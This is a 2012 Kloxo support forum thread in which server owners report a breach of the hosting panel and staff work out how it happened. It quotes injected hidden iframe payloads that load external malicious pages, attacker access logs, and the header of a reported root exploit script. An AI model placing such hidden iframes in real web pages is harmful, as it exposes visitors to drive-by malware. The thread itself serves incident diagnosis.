LxCenter HyperVM & Kloxo Support

Forum is closed. Use http://community.lxcenter.org/



Members   Search      Help    Register    Login    Home
Home » Kloxo Community Support » Technical Help » Kloxo 6.1.12 Hack
Kloxo 6.1.12 Hack [message #101670] Wed, 19 September 2012 19:45 Go to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
Hello,

I just got hacked with the last version of Kloxo 6.1.12.
The same line (with iframe) was put in some specific files (index.htm, index.php, and some .ini files). All active websites on the server has been infected.
Yet nothing has been found in log files and it's somehow disturbing.

injection of iframe in index.htm, index.php, and some .ini

<html><body>
<iframe width="0" height="0" src="http://jamnews.ir/sites/mihandownload.htm" scrolling="No" target="_blank"></iframe>
</body></html>

[Updated on: Wed, 29 January 2014 14:02] by Moderator

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #101674 is a reply to message #101670] Wed, 19 September 2012 20:13 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
Is this in the Kloxo panel itself or a site hosted on it? If a site, what specific site? WordPress, Drupal, etc?

Re: Kloxo 6.1.12 Hack [message #101675 is a reply to message #101674] Wed, 19 September 2012 21:09 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
it's on all site hosted on kloxx panel
I found this log in /usr/local/lxlabs/kloxo/log/user_cmd and all the 32 line is the file was hacked with this code
<html><body>
<iframe width="0" height="0" src="[url]http://jamnews.ir/sites/mihandownload.htm[/url]" scrolling="No" target="_blank"></iframe>
</body></html>

log in /usr/local/lxlabs/kloxo/log/user_cmd
10:44 Sep/19/2012: () paradism 'dos2unix'  '/home/blablabla/blablabla.com/index.php' dos2unix: converting file /home/blablabla/blablabla/index.php to UNIX format ...



And i found another log in /usr/local/lxlabs/kloxo/log/
The hacker change all page from Kloxo admin ???

46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:37 +0200] "GET /undefined HTTP/1.1" 404 22 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:38 +0200] "GET /undefined HTTP/1.1" 404 22 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:39 +0200] "GET /undefined HTTP/1.1" 404 22 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:40 +0200] "POST /display.php HTTP/1.1" 200 28849 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:17:08 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html HTTP/1.1" 200 29440 "http://IP OF SERVER:7778/display.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:17:43 +0200] "POST /display.php HTTP/1.1" 302 18275 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:17:43 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29885 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:26 +0200] "POST /display.php HTTP/1.1" 302 18279 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:27 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29887 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:49 +0200] "POST /display.php HTTP/1.1" 302 18279 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:49 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29887 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:58 +0200] "POST /display.php HTTP/1.1" 302 18127 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:59 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29710 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:53:54 +0200] "POST /display.php HTTP/1.1" 302 18263 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"

[Updated on: Wed, 19 September 2012 21:13]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #101676 is a reply to message #101675] Wed, 19 September 2012 21:22 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
I think i return to my last panel Gplhost DTC Because with this panel in 4 years i was never hacked
I setup this server with kloxo 10 day ago (firewall, fail2ban)
I setup the server whith centos-5-i386-hostinabox576 and updated centos + kloxo + php 5.3
Re: Kloxo 6.1.12 Hack [message #101680 is a reply to message #101676] Wed, 19 September 2012 23:11 Go to previous messageGo to next message
mustafaramadhan is currently offline mustafaramadhan  Indonesia
Messages: 5773
Registered: December 2010
Location: Yogyakarta
Super Grandmaster
Forum Moderator

The questions is:

1. What's php-type selected on 'webserver config'
2. What's setting for 'disable_functions' on 'advanced php config'

There are look like your own client hack your vps.



..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

Re: Kloxo 6.1.12 Hack [message #101685 is a reply to message #101680] Thu, 20 September 2012 06:20 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
massilia - Does the index.html date stamp with the malicious content match the date stamp of the Kloxo log?

I see the logs indicate the user in Kloxo is lescoiff. Did this user own all of the domains that were hacked? Were domains of other users hacked?


Re: Kloxo 6.1.12 Hack [message #101691 is a reply to message #101685] Thu, 20 September 2012 08:16 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
The hacker hack all domain and all account user

the hacker enter directly in the admin panel
Connexion log in admin panel
client-admin 46.19.139.249 10:31 19 Sep 12:35 19 Sep Logout
Re: Kloxo 6.1.12 Hack [message #101692 is a reply to message #101691] Thu, 20 September 2012 08:51 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
Trying to better understand this so I can see if I can find out if this is an exploit or just something insecure in the way you have set this up. So just stick with me:)

Do you use http or https to connect to Kloxo and login as admin?
Do you have the admin password in any scripts that you use maybe to create new users for example?
I ask this but know the answer, have you set up an auxillary account and disabled the admin login?
How is LxGuard configured? How many attempts?
Just give me a range, how many characters is your password? This actually shouldn't matter as much as some may think since LxGuard should be configured to block after 20 failed attempts per IP address, though it may take up to 50 before it catches it depending on how fast it is. So unless your password is a single dictionary word... Of course a 20 - 25 character password with special characters and such would be best.


Re: Kloxo 6.1.12 Hack [message #101695 is a reply to message #101692] Thu, 20 September 2012 10:31 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
Also another question you should answer is: Do you use this same admin password on all of your Kloxo installations?

Re: Kloxo 6.1.12 Hack [message #101869 is a reply to message #101670] Sun, 23 September 2012 07:59 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
I use http or https to connect to Kloxo
I don't have the admin password in any scripts that I use
I set up an auxillary account but the hacker was connected with the admin login

LxGuard configured :
port: 7778
Lxgard configured with 3 false
Iptable firewall, Fail2ban configured (ssh etc)

Web Server , apache, djbdns, bogofilter
Type Php : mod_php
PHP Config for pserver
Display Errors yes
Register Globals No
Log Errors No
Output Compression yes
Enable Xcache No
Enable Zend Yes
Enable Ioncube Yes

Advanced PHP Config
Enable Dl No
Output Buffering No
Register Long Arrays No
Allow Url Fopen No
Allow Url Include No
Register Argc Argv yes
Magic Quotes Gpc No
Mysql Allow Persistent Flag No

Disable Functions :exec,passthru,shell_exec,system,proc_open,popen,show_source


I'm not alone in this situation, other people got exactly the same problem :
http://forum.lxcenter.org/index.php?t=msg&th=19192&s tart=0&

I checked in all logs and there was no connection error from the hacker IP => it implies that he didn't try a brute force attack.
The hacker used the admin login and succeed the connection in one time as if he knew the password.
Only active websites were hacked, other disabled account on the server haven't been touched.

PS : I have no customer currently, I use this server for my personal use => and I'm not dumb enough to hack my server myself

[Updated on: Sun, 23 September 2012 08:44]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #101872 is a reply to message #101869] Sun, 23 September 2012 08:25 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
So just to be certain, you have logged in to Kloxo with the admin account through http at least once and all your Kloxos use the same password?

Re: Kloxo 6.1.12 Hack [message #101876 is a reply to message #101872] Sun, 23 September 2012 08:45 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
All account is setup with a random password with more than 8 digits and letter
Re: Kloxo 6.1.12 Hack [message #101877 is a reply to message #101876] Sun, 23 September 2012 08:50 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
for information i exchange hosting panel I go to i-mscp.net.
Because this hack it made ​​me waste my time (2 days), I specified that I server administers over 7 years this is the first time I have a hack that way and I'm lucky because the hacker would destroy all stinks from the admin account.
This is a shame because kloxo has many options and is a good hosting panel

[Updated on: Sun, 23 September 2012 08:51]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #101883 is a reply to message #101877] Sun, 23 September 2012 09:53 Go to previous messageGo to next message
mustafaramadhan is currently offline mustafaramadhan  Indonesia
Messages: 5773
Registered: December 2010
Location: Yogyakarta
Super Grandmaster
Forum Moderator

Simple answer: because 'Type Php : mod_php' instead other (especially suphp).

..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

Re: Kloxo 6.1.12 Hack [message #101888 is a reply to message #101883] Sun, 23 September 2012 10:13 Go to previous messageGo to next message
mustafaramadhan is currently offline mustafaramadhan  Indonesia
Messages: 5773
Registered: December 2010
Location: Yogyakarta
Super Grandmaster
Forum Moderator

Don't know what's the reason still using 'unsafe' php-type (mod_php)

..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

Re: Kloxo 6.1.12 Hack [message #101905 is a reply to message #101888] Sun, 23 September 2012 12:13 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
mustafa - I don't think php type has anything to do with a single user (masillia is the only person using his Kloxo) security issue. Also the admin acount was specifically logged into. If this truly was a security breach it would mean the admin account was logged into without a password at all, possibly through some kind of mysql injection. I don't think this is possible but am looking into it further.

Massillia - you still never answered whether or not you logged in as admin through http or not.


Re: Kloxo 6.1.12 Hack [message #101911 is a reply to message #101905] Sun, 23 September 2012 14:21 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
shazar wrote on Sun, 23 September 2012 18:13
mustafa - I don't think php type has anything to do with a single user (masillia is the only person using his Kloxo) security issue. Also the admin acount was specifically logged into. If this truly was a security breach it would mean the admin account was logged into without a password at all, possibly through some kind of mysql injection. I don't think this is possible but am looking into it further.

Massillia - you still never answered whether or not you logged in as admin through http or not.


http://img4.hostingpics.net/pics/421947Capturehack.jpg


I 'am connect in admin with http and https (port: 7778)
Hello for me it's a security breach because in this post ALL of VM's was hacked:
http://forum.lxcenter.org/index.php?t=msg&th=19192&s tart=0&

[Updated on: Sun, 23 September 2012 14:32]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #101913 is a reply to message #101911] Sun, 23 September 2012 15:01 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
massilia, that doesn't show much. That shows that Wordpress was hacked. A typical WordPress hack in the past does what he pasted there.

Re: Kloxo 6.1.12 Hack [message #101931 is a reply to message #101911] Mon, 24 September 2012 05:41 Go to previous messageGo to next message
adfieldz is currently offline adfieldz  Lithuania
Messages: 77
Registered: October 2008
Valuable Member
If you are talking about my situation in - why would you say its a worpress hack when I had no worpress installed on VPS ?

Anyway - i'm looking into possible solution.

I'm ready to give a full access to KLOXO and SSH to a kloxo developers on one of my VPSes which where hacked so you could check it yourslef and might find something out .

Please contact me in PM
Re: Kloxo 6.1.12 Hack [message #101935 is a reply to message #101931] Mon, 24 September 2012 07:26 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
My server with kloxo is closed and i run another panel more secure.
I can send log of this server to kloxo developers in demand, i delete this server in 3, 4 days.
if you want the log file thank you for precised exatement any folder and any file you want.

Cordialy
Massilia

[Updated on: Mon, 24 September 2012 07:26]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #101936 is a reply to message #101935] Mon, 24 September 2012 07:36 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
adfieldz - I am confusing the 2 of you! lol Could you repeat your story in one post here? I just want to read it all together to get it straight in my head.

For massilia the best thing would be the POST that did the login to actually see if a password was typed in. Essentially you believe the attacker did not know your passwords and logged in with a MySQL injection type of attack considering he had absolutely no other access like another login to the system.


Re: Kloxo 6.1.12 Hack [message #101973 is a reply to message #101936] Tue, 25 September 2012 05:48 Go to previous messageGo to next message
adfieldz is currently offline adfieldz  Lithuania
Messages: 77
Registered: October 2008
Valuable Member
Shazar - my story is here : http://forum.lxcenter.org/index.php?t=msg&th=19192&s tart=0&

Shortyly - someone injected code to all my VPSes running kloxo.

I'm offering a full SSH /Panel login so that you could check it out and might find something .
Re: Kloxo 6.1.12 Hack [message #101975 is a reply to message #101973] Tue, 25 September 2012 07:24 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
adieldz - Any particular PHP application running on all of these VPSs?

Re: Kloxo 6.1.12 Hack [message #101977 is a reply to message #101975] Tue, 25 September 2012 08:16 Go to previous messageGo to next message
adfieldz is currently offline adfieldz  Lithuania
Messages: 77
Registered: October 2008
Valuable Member
Shazar - basically SilverStripe sites on some of them 2.4.7 , no Wordpress no Joomla etc.
Re: Kloxo 6.1.12 Hack [message #101978 is a reply to message #101977] Tue, 25 September 2012 08:43 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
My guess is that it is a SilverStripe issue, though it could be mitigated if the docroots were well secured. I am guessing SilverStripe as they have had many security fixes in the past.

I don't think this is a Kloxo problem, but again a better security practice on a docroot basis could be set in place. For example:

When running mod_php apache runs the pages. With owner being user123:apache and the permissions being 644 then apache could never write to the files.

But suphp runs per user so user123:apache 644 is run as user123 with write access to everything.
So suphp and other per user implementations give you the illusion of security, but unless everything is understood you could be more vulnerable.

So a short term fix would be to chmod to 444 on all files and 555 on all directories. A long term solution could be for Kloxo to have 2 users per account.
1 user called user123 for the user to connect and write files and such. The other could be user123-apache which would be what the apache runs it as.

So to get to a point, what is the ownership and permissions and is it mod_php or suphp? Again still most likely a fault on the SilverStripe part, but this could help.


Re: Kloxo 6.1.12 Hack [message #101980 is a reply to message #101978] Tue, 25 September 2012 09:40 Go to previous messageGo to next message
adfieldz is currently offline adfieldz  Lithuania
Messages: 77
Registered: October 2008
Valuable Member
Hmm, will try to check it - however I'm bit not that strong on server management side.
While I was configuring the firewall they hacked the server again with:

<html><body>
<iframe   width="0" height="0" src="http://www.myfriendsandyour.com/999.html" frameborder="0"></iframe>
</body></html>


This time I can see the IP logged in to Admin on lkloxo
client-admin 5.39.11.14 15:28 25 Sep Still Logged -

How this could be possible when the password is 16 letters long ?!
Re: Kloxo 6.1.12 Hack [message #101981 is a reply to message #101980] Tue, 25 September 2012 09:51 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
Well if this is logged in through Kloxo, then I am wrong about the way this was hacked. Do you login through http or https? It is looking more and more like there could be some kind of injection attack to login to Kloxo as admin without the real password...

Re: Kloxo 6.1.12 Hack [message #101983 is a reply to message #101670] Tue, 25 September 2012 10:54 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
perhaps this root exploit Mad

http://roothackers.net/showthread.php?tid=92&highlight=k loxo

Re: Kloxo 6.1.12 Hack [message #101984 is a reply to message #101983] Tue, 25 September 2012 11:08 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
A user would need shell access, correct? Did either of you give a user shell access?

Re: Kloxo 6.1.12 Hack [message #101985 is a reply to message #101984] Tue, 25 September 2012 11:15 Go to previous messageGo to next message
massilia is currently offline massilia  France
Messages: 15
Registered: September 2012
Member
No don't give shell access but this post in this forum proves that kloxo is not very safe
Re: Kloxo 6.1.12 Hack [message #101986 is a reply to message #101985] Tue, 25 September 2012 11:21 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
There may be a security issue unrelated to the exploit you are pointing to. I will try to recreate this and post once I have more info.

Re: Kloxo 6.1.12 Hack [message #101988 is a reply to message #101986] Tue, 25 September 2012 13:04 Go to previous messageGo to next message
adfieldz is currently offline adfieldz  Lithuania
Messages: 77
Registered: October 2008
Valuable Member
My clients had no shell access , at least not on all vpses . But I very much doubt someone form my clients would do this, or could do this, as mostly they got no access acept CMS at all , some of them might have FTP . Shazar- I've sent you logs , so please take a look at them - they might contain traces of intrusion .

Re: Kloxo 6.1.12 Hack [message #102021 is a reply to message #101988] Wed, 26 September 2012 05:06 Go to previous messageGo to next message
lupetalo is currently offline lupetalo  
Messages: 258
Registered: April 2011
Senior Member
This is some security issue with kloxo admin. One of my servers got hacked too, with no other access but my self!
Re: Kloxo 6.1.12 Hack [message #102029 is a reply to message #102021] Wed, 26 September 2012 07:10 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
lupetalo - Yes, I still need to investigate further, but you should cut off access to Kloxo and check your systems to ensure nothing was added and none of the passwords were changed.

Someone has PMed me with some information and I am waiting for further clarification.


Re: Kloxo 6.1.12 Hack [message #102163 is a reply to message #102029] Thu, 27 September 2012 18:13 Go to previous messageGo to next message
Mavashi is currently offline Mavashi  Ukraine
Messages: 4
Registered: January 2010
Location: Ukraine
Member

Subscribing to topic also. Will wait till lxrestart.c patch released.
Re: Kloxo 6.1.12 Hack [message #102194 is a reply to message #102163] Fri, 28 September 2012 04:50 Go to previous messageGo to next message
mustafaramadhan is currently offline mustafaramadhan  Indonesia
Messages: 5773
Registered: December 2010
Location: Yogyakarta
Super Grandmaster
Forum Moderator

Some points from http://roothackers.net/showthread.php?tid=92&highlight=k loxo above:

1. All client get 'apache' user for access their website --> only 'pure' mod_php set all user as 'apache'
2. Possible access lxphp (special php for kloxo) with different user access via --> start/restart kloxo will be call phpsuexec.sh by lxlighttpd


..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

Re: Kloxo 6.1.12 Hack [message #102206 is a reply to message #102194] Fri, 28 September 2012 06:33 Go to previous messageGo to next message
shazar is currently offline shazar  United States
Messages: 1861
Registered: May 2011
Grandmaster
LxCenter Core Team Member
LxCenter Representative
As already stated, that link has nothing to do with apache but has to do with shell access.

[Updated on: Fri, 28 September 2012 06:34]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #102207 is a reply to message #102206] Fri, 28 September 2012 06:39 Go to previous messageGo to next message
mustafaramadhan is currently offline mustafaramadhan  Indonesia
Messages: 5773
Registered: December 2010
Location: Yogyakarta
Super Grandmaster
Forum Moderator

How about:
Quote:


#!/bin/sh
# LXLabs Kloxo lxsuexec+lxrestart local root 0day
# 2012 Aurora
# requires you to be the apache user



..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

[Updated on: Fri, 28 September 2012 06:40]

Report message to a moderator

Re: Kloxo 6.1.12 Hack [message #102208 is a reply to message #102207] Fri, 28 September 2012 06:48 Go to previous messageGo to next message
lupetalo is currently offline lupetalo  
Messages: 258
Registered: April 2011
Senior Member
This is not related to the hack or is not fully described at http://roothackers.net/showthread.php?tid=92&highlight=k loxo because server that was hacked had suexec and nobody had shell access.
Re: Kloxo 6.1.12 Hack [message #102210 is a reply to message #102208] Fri, 28 September 2012 07:02 Go to previous messageGo to previous message
mustafaramadhan is currently offline mustafaramadhan  Indonesia
Messages: 5773
Registered: December 2010
Location: Yogyakarta
Super Grandmaster
Forum Moderator

